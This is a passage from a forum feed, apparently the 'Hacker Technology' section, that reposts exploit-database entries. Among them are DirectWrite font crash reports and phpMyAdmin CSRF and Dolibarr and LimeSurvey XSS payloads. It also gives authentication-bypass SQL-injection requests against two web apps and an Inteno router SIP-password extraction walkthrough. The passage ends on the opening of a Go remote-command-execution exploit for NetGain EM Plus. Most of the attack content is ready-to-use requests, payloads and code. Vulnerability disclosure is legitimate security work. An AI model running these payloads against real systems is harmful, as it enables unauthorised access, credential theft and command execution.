000000a3`a00ece60 00007ffe`bf4de95f d2d1!GlyphRunAnalyzer::AddCachedGlyph+0x62 09 000000a3`a00ecf10 00007ffe`bf4e60b0 d2d1!GlyphRunAnalyzer::GetGlyphs+0x18f 0a 000000a3`a00ecf60 00007ffe`bf4f572d d2d1!GlyphRunRenderer::InitForRendering+0x2c0 0b 000000a3`a00ed0a0 00007ffe`bf55ffe4 d2d1!CHwSurfaceRenderTarget::DrawGlyphRun+0x38d 0c 000000a3`a00ed3b0 00007ffe`bf4f379e d2d1!BrushRedirectionCompatibleCommand<CCommand_DrawGlyphRun,0>::Execute+0x134 0d 000000a3`a00ed4c0 00007ffe`bf50e7ef d2d1!CHwSurfaceRenderTarget::ProcessBatch+0x3ce 0e 000000a3`a00ed570 00007ffe`bf50a0ae d2d1!CBatchSerializer::FlushInternal+0x13f 0f 000000a3`a00ed600 00007ffe`bf50143b d2d1!DrawingContext::Flush+0x96 10 000000a3`a00ed660 00007ffe`99d3551e d2d1!D2DDeviceContextBase<ID2D1DeviceContext6,ID2D1DeviceContext6,null_type>::EndDraw+0x13b 11 000000a3`a00ed7a0 00007ffe`99bca704 edgehtml!CDXRenderTarget::EndDrawD2D+0x66 12 000000a3`a00ed7d0 00007ffe`99bca4e8 edgehtml!CDXRenderTarget::EnsureRenderMode+0x184 13 000000a3`a00ed800 00007ffe`99d2db85 edgehtml!CDXRenderTarget::EndDraw+0x38 14 000000a3`a00ed850 00007ffe`99d2da0b edgehtml!CDispSurface::EndLayerToRenderTarget+0x145 15 000000a3`a00ed8f0 00007ffe`99bb585f edgehtml!CDispNodeDestination::EndRender+0x6b 16 000000a3`a00ed960 00007ffe`99cf60c1 edgehtml!CDispNodeDestination::EndRect+0xaf 17 000000a3`a00ed9a0 00007ffe`99bacf83 edgehtml!CDispDestinationDrawHelper::EndRect+0x31 18 000000a3`a00ed9d0 00007ffe`99b6e055 edgehtml!CDispContainer::DrawSelfContent+0x583 19 000000a3`a00edb40 00007ffe`99b6f37e edgehtml!CDispContainer::DrawSelf+0x365 1a 000000a3`a00edcd0 00007ffe`99baee43 edgehtml!CDispNode::DrawInternal+0x7ce 1b 000000a3`a00ee060 00007ffe`99bad747 edgehtml!CDispNode::Draw+0x943 1c 000000a3`a00ee270 00007ffe`99bad297 edgehtml!CDispContainer::DrawChildren+0x227 1d 000000a3`a00ee330 00007ffe`99bacbc8 edgehtml!CDispContainer::DrawSelfContentFullStackingContext+0x127 1e 000000a3`a00ee420 00007ffe`99b6e055 edgehtml!CDispContainer::DrawSelfContent+0x1c8 1f 000000a3`a00ee590 00007ffe`99b6f37e edgehtml!CDispContainer::DrawSelf+0x365 20 000000a3`a00ee720 00007ffe`99baead3 edgehtml!CDispNode::DrawInternal+0x7ce 21 000000a3`a00eeab0 00007ffe`99bba8fc edgehtml!CDispNode::Draw+0x5d3 22 000000a3`a00eecc0 00007ffe`99bb9b68 edgehtml!CDispRoot::DrawIndependentCompositionLayerTree+0x5c 23 000000a3`a00eedb0 00007ffe`99bb97f5 edgehtml!CDispRoot::DrawRoot+0x1b8 24 000000a3`a00ef000 00007ffe`99c3452c edgehtml!CPaintHandler::RenderInternal+0x2b5 25 000000a3`a00ef580 00007ffe`99b54ac8 edgehtml!CPaintHandler::RenderIfNeeded+0x7c 26 000000a3`a00ef5f0 00007ffe`99d3a80d edgehtml!CRenderThread::ProcessRenderWork+0xdc 27 000000a3`a00ef650 00007ffe`99c5fdb9 edgehtml!CRenderTaskDrawInPlace::Execute+0xad 28 000000a3`a00ef6c0 00007ffe`99d77542 edgehtml!CRenderThread::RenderThread+0x229 29 000000a3`a00ef760 00007ffe`c32937e4 edgehtml!CRenderThread::StaticRenderThreadProc+0x42 2a 000000a3`a00ef790 00007ffe`c5e1cb81 KERNEL32!BaseThreadInitThunk+0x14 2b 000000a3`a00ef7c0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 --- cut --- We have minimized the test cases to a 1-byte difference in the EBLC table, and a 2-byte difference in the EBDT table in relation to the original files. The issue reproduces on a fully updated Windows 10 1709; we haven't tested other versions of the system. It could be used to disclose sensitive data from the process address space, which is clearly visible when opening the PoC HTML files in Edge. In most cases, instead of crashing, the browser will display random chunks of heap memory residing after the glyph's bitmap allocation. As shown in 1/poc.html and 2/poc.html, the problems are related to glyphs corresponding to characters with codes 0xF0 and 0x2020, respectively. Attached is a pair of minimized PoC fonts, original fonts, and HTML files to reproduce the bug in a browser. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47382.zip
  11. HireHackking

    Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts

    HireHackking posted a blog entry in Hacker Technology
    Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs (such as the Chrome, Firefox and Edge browsers) and constitutes an attack surface for memory corruption bugs, as it performs the processing of untrusted font files and is written in C/C++. Through fuzzing, we have discovered a crash caused by an invalid memory read in DWrite!SplicePixel, while rasterizing the glyphs of a slightly malformed OpenType font. The problem reproduces in all major browsers; below is a crash log from the Microsoft Edge renderer process, generated when trying to open a web page with the proof-of-concept font embedded: --- cut --- (281c.25d4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. DWrite!SplicePixel+0x14b: 00007fff`b8634473 488b14f0 mov rdx,qword ptr [rax+rsi*8] ds:00000227`c62d95b0=???????????????? 0:031> u DWrite!SplicePixel+0x14b: 00007fff`b8634473 488b14f0 mov rdx,qword ptr [rax+rsi*8] 00007fff`b8634477 4885d2 test rdx,rdx 00007fff`b863447a 7474 je DWrite!SplicePixel+0x1c8 (00007fff`b86344f0) 00007fff`b863447c 458d4b01 lea r9d,[r11+1] 00007fff`b8634480 8b4208 mov eax,dword ptr [rdx+8] 00007fff`b8634483 413bc1 cmp eax,r9d 00007fff`b8634486 7f68 jg DWrite!SplicePixel+0x1c8 (00007fff`b86344f0) 00007fff`b8634488 488b0a mov rcx,qword ptr [rdx] 0:031> ? rax Evaluate expression: 2369851854688 = 00000227`c62d8f60 0:031> ? rsi Evaluate expression: 202 = 00000000`000000ca 0:031> dd rax 00000227`c62d8f60 ???????? ???????? ???????? ???????? 00000227`c62d8f70 ???????? ???????? ???????? ???????? 00000227`c62d8f80 ???????? ???????? ???????? ???????? 00000227`c62d8f90 ???????? ???????? ???????? ???????? 00000227`c62d8fa0 ???????? ???????? ???????? ???????? 00000227`c62d8fb0 ???????? ???????? ???????? ???????? 00000227`c62d8fc0 ???????? ???????? ???????? ???????? 00000227`c62d8fd0 ???????? ???????? ???????? ???????? 0:031> k # Child-SP RetAddr Call Site 00 000000b4`ceaebe00 00007fff`b8634306 DWrite!SplicePixel+0x14b 01 000000b4`ceaebe50 00007fff`b8633325 DWrite!SetPixelInDropOut+0x9a 02 000000b4`ceaebe90 00007fff`b86322a8 DWrite!FillInInflection+0xcd 03 000000b4`ceaebf00 00007fff`b863281b DWrite!DoXInflections+0x118 04 000000b4`ceaebf40 00007fff`b86319ca DWrite!EditBlackSpace+0x29f 05 000000b4`ceaebfa0 00007fff`b8636118 DWrite!CScan+0x72 06 000000b4`ceaebff0 00007fff`b855b1b2 DWrite!CScanFill+0x204 07 000000b4`ceaec0e0 00007fff`b848ccef DWrite!DoType1InterpretCharString+0xcd77a 08 000000b4`ceaec790 00007fff`b862ea16 DWrite!Type1InterpretCharString+0x163 09 000000b4`ceaec880 00007fff`b862dd49 DWrite!BuildRuns+0x186 0a 000000b4`ceaec9b0 00007fff`b862b2b9 DWrite!ATMBuildBitMap+0xb9 0b 000000b4`ceaeca80 00007fff`b85b88b7 DWrite!AdobeInternalGetBitmap+0x31d 0c 000000b4`ceaecd20 00007fff`b85b877a DWrite!CffRasterizer::Implementation::GetBitmap+0x11f 0d 000000b4`ceaece60 00007fff`b84e2c89 DWrite!CffRasterizer::GetBitmap+0x2a 0e 000000b4`ceaecea0 00007fff`b84b1754 DWrite!GlyphBitmapRasterizationState::RasterizeGlyph+0x111 0f 000000b4`ceaecee0 00007fff`c8e3e1ce DWrite!DWriteGlyphLookupCache::GetGlyphBitmapInfo+0x264 10 000000b4`ceaed150 00007fff`c8e3e95f d2d1!GlyphRunAnalyzer::AddCachedGlyph+0x62 11 000000b4`ceaed200 00007fff`c8e460b0 d2d1!GlyphRunAnalyzer::GetGlyphs+0x18f 12 000000b4`ceaed250 00007fff`c8e5572d d2d1!GlyphRunRenderer::InitForRendering+0x2c0 13 000000b4`ceaed390 00007fff`c8ebffe4 d2d1!CHwSurfaceRenderTarget::DrawGlyphRun+0x38d 14 000000b4`ceaed6a0 00007fff`c8e5379e d2d1!BrushRedirectionCompatibleCommand<CCommand_DrawGlyphRun,0>::Execute+0x134 15 000000b4`ceaed7b0 00007fff`c8e6e7ef d2d1!CHwSurfaceRenderTarget::ProcessBatch+0x3ce 16 000000b4`ceaed860 00007fff`c8e6a0ae d2d1!CBatchSerializer::FlushInternal+0x13f 17 000000b4`ceaed8f0 00007fff`c8e6143b d2d1!DrawingContext::Flush+0x96 18 000000b4`ceaed950 00007fff`9dba551e d2d1!D2DDeviceContextBase<ID2D1DeviceContext6,ID2D1DeviceContext6,null_type>::EndDraw+0x13b 19 000000b4`ceaeda90 00007fff`9da3a704 edgehtml!CDXRenderTarget::EndDrawD2D+0x66 1a 000000b4`ceaedac0 00007fff`9da3a4e8 edgehtml!CDXRenderTarget::EnsureRenderMode+0x184 1b 000000b4`ceaedaf0 00007fff`9db9db85 edgehtml!CDXRenderTarget::EndDraw+0x38 1c 000000b4`ceaedb40 00007fff`9db9da0b edgehtml!CDispSurface::EndLayerToRenderTarget+0x145 1d 000000b4`ceaedbe0 00007fff`9da2585f edgehtml!CDispNodeDestination::EndRender+0x6b 1e 000000b4`ceaedc50 00007fff`9db660c1 edgehtml!CDispNodeDestination::EndRect+0xaf 1f 000000b4`ceaedc90 00007fff`9da1cf83 edgehtml!CDispDestinationDrawHelper::EndRect+0x31 20 000000b4`ceaedcc0 00007fff`9d9de055 edgehtml!CDispContainer::DrawSelfContent+0x583 21 000000b4`ceaede30 00007fff`9d9df37e edgehtml!CDispContainer::DrawSelf+0x365 22 000000b4`ceaedfc0 00007fff`9da1ee43 edgehtml!CDispNode::DrawInternal+0x7ce 23 000000b4`ceaee350 00007fff`9da1d747 edgehtml!CDispNode::Draw+0x943 24 000000b4`ceaee560 00007fff`9da1d297 edgehtml!CDispContainer::DrawChildren+0x227 25 000000b4`ceaee620 00007fff`9da1cbc8 edgehtml!CDispContainer::DrawSelfContentFullStackingContext+0x127 26 000000b4`ceaee710 00007fff`9d9de055 edgehtml!CDispContainer::DrawSelfContent+0x1c8 27 000000b4`ceaee880 00007fff`9d9df37e edgehtml!CDispContainer::DrawSelf+0x365 28 000000b4`ceaeea10 00007fff`9da1ead3 edgehtml!CDispNode::DrawInternal+0x7ce 29 000000b4`ceaeeda0 00007fff`9da2a8fc edgehtml!CDispNode::Draw+0x5d3 2a 000000b4`ceaeefb0 00007fff`9da29b68 edgehtml!CDispRoot::DrawIndependentCompositionLayerTree+0x5c 2b 000000b4`ceaef0a0 00007fff`9da297f5 edgehtml!CDispRoot::DrawRoot+0x1b8 2c 000000b4`ceaef2f0 00007fff`9daa452c edgehtml!CPaintHandler::RenderInternal+0x2b5 2d 000000b4`ceaef870 00007fff`9d9c4ac8 edgehtml!CPaintHandler::RenderIfNeeded+0x7c 2e 000000b4`ceaef8e0 00007fff`9dbaa80d edgehtml!CRenderThread::ProcessRenderWork+0xdc 2f 000000b4`ceaef940 00007fff`9dacfdb9 edgehtml!CRenderTaskDrawInPlace::Execute+0xad 30 000000b4`ceaef9b0 00007fff`9dbe7542 edgehtml!CRenderThread::RenderThread+0x229 31 000000b4`ceaefa50 00007fff`cec537e4 edgehtml!CRenderThread::StaticRenderThreadProc+0x42 32 000000b4`ceaefa80 00007fff`cf5bcb81 KERNEL32!BaseThreadInitThunk+0x14 33 000000b4`ceaefab0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 --- cut --- We have minimized the test case to a single-byte difference in relation to the original file. When decompiled with the "ttx" utility from the fontTools package, the difference becomes obvious: it's a change of one of the FontMatrix values inside the CFF table. Original data: <FontMatrix value="0.001 0.0 0.000123 0.001 0.0 0.0"/> Mutated data: <FontMatrix value="0.001 2000000.0 0.000123 0.001 0.0 0.0"/> The issue reproduces on a fully updated Windows 7 and Windows 10 1709; we haven't tested other versions of the system. It could be potentially used to disclose sensitive data from the process address space. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are the minimized PoC font, original font, an HTML file to reproduce the bug in a browser, and 3 extra non-minimized samples which also trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47381.zip
  12. HireHackking

    phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery

    HireHackking posted a blog entry in Hacker Technology
    ============================================= MGC ALERT 2019-003 - Original release date: June 13, 2019 - Last revised: September 13, 2019 - Discovered by: Manuel Garcia Cardenas - Severity: 4,3/10 (CVSS Base Score) - CVE-ID: CVE-2019-12922 ============================================= I. VULNERABILITY ------------------------- phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery II. BACKGROUND ------------------------- phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. III. DESCRIPTION ------------------------- Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any server in the Setup page. IV. PROOF OF CONCEPT ------------------------- Exploit CSRF - Deleting main server <p>Deleting Server 1</p> <img src=" http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" /> V. BUSINESS IMPACT ------------------------- The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method. VI. SYSTEMS AFFECTED ------------------------- phpMyAdmin <= 4.9.0.1 VII. SOLUTION ------------------------- Implement in each call the validation of the token variable, as already done in other phpMyAdmin requests. VIII. REFERENCES ------------------------- https://www.phpmyadmin.net/ IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY ------------------------- June 13, 2019 1: Initial release September 13, 2019 2: Last revision XI. DISCLOSURE TIMELINE ------------------------- June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas June 13, 2019 2: Send to vendor July 16, 2019 3: New request to vendor without fix date September 13, 2019 4: Sent to lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester
  13. HireHackking

    Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross Site Scripting # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://www.dolibarr.org/downloads # Version: 10.0.1 # Category: Webapps # Tested on: Xampp for Linux # CVE: CVE-2019-16197 # Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business... ================================================================== Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of the User-Agent HTTP header is copied into the HTML document as plain text between tags, leading to XSS. GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>
  14. HireHackking

    LimeSurvey 3.17.13 - Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    SEC Consult Vulnerability Lab Security Advisory < 20190912-0 > ======================================================================= title: Stored and reflected XSS vulnerabilities product: LimeSurvey vulnerable version: <= 3.17.13 fixed version: =>3.17.14 CVE number: CVE-2019-16172, CVE-2019-16173 impact: medium homepage: https://www.limesurvey.org/ found: 2019-08-23 by: Andreas Kolbeck (Office Munich) David Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "LimeSurvey is the tool to use for your online surveys. Whether you are conducting simple questionnaires with just a couple of questions or advanced assessments with conditionals and quota management, LimeSurvey has got you covered. LimeSurvey is 100% open source and will always be transparently developed. We can help you reach your goals." Source: https://www.limesurvey.org/ Business recommendation: ------------------------ LimeSurvey suffered from a vulnerability due to improper input and output validation. By exploiting this vulnerability an attacker could: 1. Attack other users of the web application with JavaScript code, browser exploits or Trojan horses, or 2. perform unauthorized actions in the name of another logged-in user. The vendor provides a patch which should be installed immediately. Furthermore, a thorough security analysis is highly recommended as only a short spot check has been performed and additional issues are to be expected. Vulnerability overview/description: ----------------------------------- 1) Stored and reflected XSS vulnerabilities LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability, which allows an attacker to execute JavaScript code with the permissions of the victim. In this way it is possible to escalate privileges from a low-privileged account e.g. to "SuperAdmin". Proof of concept: ----------------- 1) Stored and reflected XSS vulnerabilities Example 1 - Stored XSS (CVE-2019-16172): The attacker needs the appropriate permissions in order to create new survey groups. Then create a survey group with a JavaScript payload in the title, for example: test<svg/onload=alert(document.cookie)> When the survey group is being deleted, e.g. by an administrative user, the JavaScript code will be executed as part of the "success" message. Example 2 - Reflected XSS (CVE-2019-16173): The following proof of concept prints the current CSRF token cookie which contains the CSRF token. The parameter "surveyid" is not filtered properly: http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20 src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question If the URL schema is configured differently the following payload works: http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid= xxx"><img%20src=x%20onerror="alert(document.cookie)">&sa=listquestions&sort=question Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in version 3.17.9 and the latest version 3.17.13. It is assumed that older versions are affected as well. Vendor contact timeline: ------------------------ 2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204 2019-09-02: Fixes available: https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006 2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues 2019-09-03: Release of LimeSurvey v3.17.15 bug fix 2019-09-12: Coordinated release of security advisory Solution: --------- Update to version 3.17.15 or higher: https://www.limesurvey.org/stable-release The vendor provides a detailed list of changes here: https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF A. Kolbeck / @2019
  15. HireHackking

    AppXSvc - Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    #-----------------------------------------------------------------------------# # Exploit Title: AppXSvc - Arbitrary File Security Descriptor Overwrite (EoP) # # Date: Sep 4 2019 # # Exploit Author: Gabor Seljan # # Vendor Homepage: https://www.microsoft.com/ # # Version: 17763.1.amd64fre.rs5_release.180914-1434 # # Tested on: Windows 10 Version 1809 for x64-based Systems # # CVE: CVE-2019-1253 # #-----------------------------------------------------------------------------# Summary: AppXSvc improperly handles file hard links resulting in a low privileged user being able to take 'Full Control' of an arbitrary file leading to elevation of privilege. Description: An elevation of privilege vulnerability exists when the AppX Deployment Server (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841 originally reported by Nabeel Ahmed, I have found that AppXSvc sometimes opens the settings.dat[.LOGx] files of Microsoft Edge for a restore operation that modifies the security descriptor of the files. Further analyzis revealed that the restore operation can be triggered on demand by preventing AppXSvc from accessing the settings.dat[.LOGx] files. This can be achieved by locking the settings.dat[.LOGx] file, resulting in 'Access Denied' and 'Sharing Violation' errors when Edge and AppXSvc are trying to access it. Eventually the restore operation kicks in and if the settings.dat[.LOGx] file has been replaced with a hard link AppXSvc will overwrite the security descriptor of the target file. A low privileged user can leverage this vulnerability to take 'Full Control' of an arbitrary file. Steps to reproduce: 1. Terminate Edge. 2. Create a hard link from settings.dat.LOG2 to C:\Windows\win.ini. 3. Open the hard link for reading and lock the file. 4. Start Edge and wait a few seconds for the restore operation to kick in. 5. Unlock the file and close the file handle. Expected result: Full access (GENERIC_ALL) to C:\Windows\win.ini is denied. Observed result: C:\Windows\win.ini has had it's security descriptor rewritten to grant 'Full Control' to the low privileged user. PoC files: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47389.zip References: https://github.com/sgabe/CVE-2019-1253 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1253 https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
  16. HireHackking

    College-Management-System 1.2 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: College-Management-System 1.2 - Authentication Bypass # Author: Cakes # Discovery Date: 2019-09-14 # Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System # Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip # Tested Version: 1.2 # Tested on OS: CentOS 7 # CVE: N/A # Discription: # Easy authentication bypass vulnerability on the application # allowing the attacker to log in as the school principal. # Simply replay the below Burp request or use Curl. # Payload: ' or 0=0 # POST /college/principalcheck.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://TARGET/college/principalcheck.php Content-Type: application/x-www-form-urlencoded Content-Length: 36 Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 emailid='%20or%200%3d0%20#&pass=asdf
  17. HireHackking

    Ticket-Booking 1.4 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Ticket-Booking 1.4 - Authentication Bypass # Author: Cakes # Discovery Date: 2019-09-14 # Vendor Homepage: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking # Software Link: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking/archive/master.zip # Tested Version: 1.4 # Tested on OS: CentOS 7 # CVE: N/A # Description: # Easy authentication bypass vulnerability on this ticket booking application # allowing the attacker to remove any previously booked seats # Simply replay the below Burp request or use Curl (remember to change the Cookie Values) POST /ticket/cancel.php HTTP/1.1 Host: Target User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://Target/ticket/login.php Content-Type: application/x-www-form-urlencoded Content-Length: 50 Cookie: PHPSESSID=j9jrgserbga22a9q9u165uirh4; rental_property_manager=mq5iitk8ic80ffa8dcf28294d4 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 userid='%20or%200%3d0%20#&password=123&save=signin
  18. HireHackking

    Inteno IOPSYS Gateway - Improper Access Restrictions

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions # Date: 2019-06-29 # Exploit Author: Gerard Fuguet (gerard@fuguet.cat) # Vendor Homepage: https://www.intenogroup.com/ # Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650 # Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937 # Affected Component: SIP password, Info Gathering of Network Config # Attack Type: Remote # Tested on: Kali Linux 2019.2 against an Inteno EG200 Router # CVE : CVE-2019-13140 # Description: Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 and before firmwares routers have a JUCI ACL misconfiguration that allows the "user" account to extract the 3DES key via JSON commands to ubus. The 3DES key is used to decrypt the provisioning file provided by Adamo Telecom on a public URL via cleartext HTTP. # Attack Vectors: To get success on the exploitation, two components are mandatory: 1. the encrypted file (.enc) and 2. The 3DES key for decrypt it. The encrypted file can be downloaded via HTTP URL offered by Adamo ISP (works from any external network). Then is need to interact with the router using WebSocket protocol to obtain the 3DES key, a web browser like Firefox can be used as WebSocket client under the developer tools. Session id is acquired with the same username and password of the router (in this case, password is the same as wifi defaults). Once 3DES key is obtained through a JSON request command, .enc file can be decrypted with the help of openssl tool. # PoC: Step 1: Getting the provisioning file Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc Where XXXXXXXXXXXX is your router’s Inteno MAC, all in capitals and without the colons. You can also get your MAC by doing a ping to the router and then an arp command on terminal. Step 2: The 3DES Key Let's communcatie by Sockets - Using Firefox, open the router’s webpage (192.168.1.1 by default). - Invoke the developer tools by pressing F12 and go to the Console Tab. - Let’s create the WebSocket: var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json") - And creating the Log for show responses in each petition: superSocket.onmessage = function (event) {console.log(event.data)} - We request an ID session with the same login parameters that when access to the router’s website. (put your wifis router password instead of wifis-password value): superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666})) - Now, you will obtain a response, the value of the parameter that says “ubus_rpc_session” refers to your session’s ID, copy it to use in the next request call. - Requesting information about the router’s System. (put your session ID instead of put-your-session-id-here value): superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999})) - On the response obtained, copy the value of the “des” parameter. It’s 16 digits that we need convert to hexadecimal. Step 3: Ready for Decrypting Convert to HEX using xxd tool where XXXXXXXXXXXXXXXX is your "des" key: echo -n XXXXXXXXXXXXXXXX | xxd -p - Use openssl tool to decrypt your provisioning file. (Put your "des" key instead of your-des-key-in-hex-format value and the XXXXXXXXXXXX refers the name of your encryption provisioning file, in the -out value, the name can be different): openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz - Uncompress the decrypted file: tar -xzvf XXXXXXXXXXXX.tar.gz - You get the file: Provisioning.conf. - Showing the file: cat Provisioning.conf - The end of the line refers to the secret, the password of your SIP account. A video was created to show all these Steps in action: https://youtu.be/uObz1uE5P4s # Additional Information: A packet sniffer like Wireshark can be used for retrieve the 3DES key instead of using WebSocket communication protocol. In that case, user needs to do the login on the router's page, and then the JSON request containing the 3DES key will be catched. # References: https://twitter.com/GerardFuguet/status/1169298861782896642 https://www.slideshare.net/fuguet/call-your-key-to-phone-all # Timeline: 2019-06-29 - White Paper done 2019-07-01 - CVE assigned 2019-07-09 - Notified to Inteno 2019-07-11 - Adamo aware and ask for detailed info 2019-07-12 - Info facilitated 2019-07-25 - Early patch available and applied (Cooperation starts) 2019-07-26 - Tested and failed (VoIP not working) 2019-08-27 - New firmware available 2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router 2019-08-31 - Tested OK 2019-09-04 - Disclosure published
  19. HireHackking

    NetGain EM Plus 10.1.68 - Remote Command Execution

    HireHackking posted a blog entry in Hacker Technology
    /******************************************************************************** # Exploit Title: NetGain EM Plus <= v10.1.68 - Unauthorized Local File Inclusion # Date: 15 September 2019 # Exploit Author: azams / @TheRealAzams # Vendor Homepage: http://netgain-systems.com # Software Link: http://www.netgain-systems.com/free/ # Version: v10.1.68 # Tested on: Linux # # Install golang: https://golang.org/doc/install # Compile exploit: go build exploit.go # Run exploit without compiling: go run exploit.go # Shouts: Rix, Channisa, Ridho7ul & Horangi! *********************************************************************************/ package main import ( "crypto/tls" "fmt" "io/ioutil" "net/http" "net/url" "os" "strings" ) var ( target string port string cmd string ) func main() { for i := range os.Args { if os.Args[i] == "-u" { target = os.Args[i+1] } else if os.Args[i] == "-p" { port = os.Args[i+1] } else if os.Args[i] == "-cmd" { cmd = os.Args[i+1] } } if target != "" || port != "" || cmd != "" { cmd = "type=sh&content=%232Fbin%2Fsh%0Aecho+'0xdeadnoob'%0a" + cmd + "%0aecho+'0xdeadnoob'&args=&count=0&ip=localhost" status, body := exploit() if strings.Contains(status, "200") { fmt.Println("Status Code: " + status) result := strings.Split(body, "0xdeadnoob") fmt.Println("Result: \n" + strings.Trim(result[1], "\n")) return } 